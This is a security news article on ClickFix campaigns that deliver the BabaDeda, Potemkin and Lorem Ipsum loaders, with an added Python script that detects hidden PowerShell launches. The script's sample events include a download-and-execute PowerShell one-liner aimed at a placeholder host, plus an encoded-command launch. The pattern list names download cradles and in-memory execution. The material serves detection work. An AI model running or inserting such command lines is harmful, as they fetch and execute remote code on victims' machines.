HackMyIP
2026-06-16 The Hacker News

ClickFix Attacks Deploy New Loaders: BabaDeda, Potemkin, and Lorem Ipsum

Tags: Malware, Threat Intel, Phishing

Cybersecurity researchers from Morphisec, BlueVoyant, and Huntress have independently identified a wave of ClickFix social engineering campaigns distributing three new malware loaders: BabaDeda Loader, Lorem Ipsum Loader, and Potemkin. First observed in April 2026, BabaDeda Loader activity has primarily targeted education and financial organizations. Morphisec researcher Shmuel Uzan noted that while earlier BabaDeda activity concealed payloads inside legitimate-looking installer packages, the updated framework retains that same code genome but evolves into a far more capable loader engineered for stealth, evasion, and payload flexibility. BabaDeda itself is a crypter service first documented in November 2021, previously linked to campaigns against the cryptocurrency and Web3 sectors distributing information stealers, RATs, and LockBit ransomware.

The attack chain begins with a ClickFix lure that deceives users into executing attacker-supplied PowerShell commands. The resulting loader combines hidden PowerShell execution, in-memory shellcode, DLL side-loading, and external payload storage to drop information stealers and remote access trojans. The loader profiles the host, avoids running on Russian or Belarusian systems, and performs security product checks before injecting the main payload into a trusted Windows process such as svchost.exe. A notable design element is the staged component called Storage Crypter, which reads payloads from external storage-like files such as "List.Control.dat," keeping malicious code hidden from forensic analysis until moments before execution.
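The first stage of the chain above, a user pasting an attacker-supplied command that launches hidden PowerShell, leaves a characteristic process-creation footprint: the interpreter is spawned by the Run dialog (hosted by explorer.exe) or a browser rather than by a script host or scheduler, and its command line carries window-hiding, policy-bypass, encoding or download-and-execute switches. The detection sketch below is an added example and is not code from the article, Morphisec, BlueVoyant or Huntress. It scores constructed process-creation records shaped like Sysmon Event ID 1 fields; the field names, the parent-process list, the indicator patterns and the hit threshold are all assumptions a team would tune against its own telemetry.

```python
"""Heuristic triage of process-creation events for ClickFix-style hidden
PowerShell execution. Added example; sample events are constructed."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    # Assumed field subset of a Sysmon Event ID 1 / EDR process-start record
    image: str
    parent_image: str
    command_line: str


# Interpreters a pasted ClickFix command usually lands in (assumption)
SHELLS = {"powershell.exe", "pwsh.exe"}
# Parents that indicate a user-initiated launch: the Run dialog lives in
# explorer.exe, and some lures trigger from the browser itself (assumption)
USER_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}

# Command-line switches and cradle keywords that rarely co-occur in benign
# interactive use; names are this example's own labels
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "download_cradle": re.compile(
        r"\b(?:iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring)\b", re.I),
    "in_memory_exec": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX style path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcEvent) -> list[str]:
    """Return the list of indicator names matched by one event (empty if the
    started process is not a PowerShell interpreter)."""
    hits: list[str] = []
    if basename(ev.image) not in SHELLS:
        return hits
    if basename(ev.parent_image) in USER_PARENTS:
        hits.append("user_initiated_parent")
    for name, rx in INDICATORS.items():
        if rx.search(ev.command_line):
            hits.append(name)
    return hits


def is_clickfix_candidate(ev: ProcEvent, min_hits: int = 3) -> bool:
    """Flag only user-initiated launches that also carry at least two
    suspicious command-line indicators (threshold is an assumption)."""
    hits = score_event(ev)
    return "user_initiated_parent" in hits and len(hits) >= min_hits


def triage(events: list[ProcEvent]) -> list[tuple[int, list[str]]]:
    """Index and matched indicators for every candidate event."""
    return [(i, score_event(ev)) for i, ev in enumerate(events)
            if is_clickfix_candidate(ev)]


# Constructed sample events; the URL and the base64 blob are filler, not IoCs
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\explorer.exe",
              'powershell -w hidden -nop -ep bypass -c "iex (iwr https://example.invalid/stage1)"'),
    ProcEvent(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\services.exe",
              "svchost.exe -k netsvcs"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\explorer.exe",
              '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"'),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\cmd.exe",
              r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\nightly.ps1"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
              "powershell.exe -w h -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFB"),
]

if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(hits)}")
```

Events 0 and 4 are flagged; the plain interactive console (event 2) and the scheduled script launched from cmd.exe with an execution-policy bypass (event 3) are not, because a single indicator without a user-facing parent is common in administration. The same parent-and-switches logic transfers directly to a SIEM query over real process telemetry; the regexes are deliberately loose on abbreviated switches because the lures abbreviate them.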

One of the malware families delivered through BabaDeda Loader is a .NET backdoor and information stealer capable of collecting detailed system information, discovering installed browser profiles, extracting cookies, browsing history, saved credentials, preferences, and local-state encryption keys, traversing directories based on configurable rules, reading and exfiltrating file contents, capturing screenshots, executing shell commands, and transferring data back to a C2 server. It leverages native Windows APIs for process interaction, memory operations, DPAPI access, Restart Manager behavior, and advanced file access. A second attack chain drops a ZIP archive using DLL side-loading to launch DanaBot and SectopRAT (aka ArechClient). Given the credential-harvesting capabilities of these loaders, users should verify exposed credentials using an email breach checker and test password strength with a password checker to reduce the impact of any compromise.

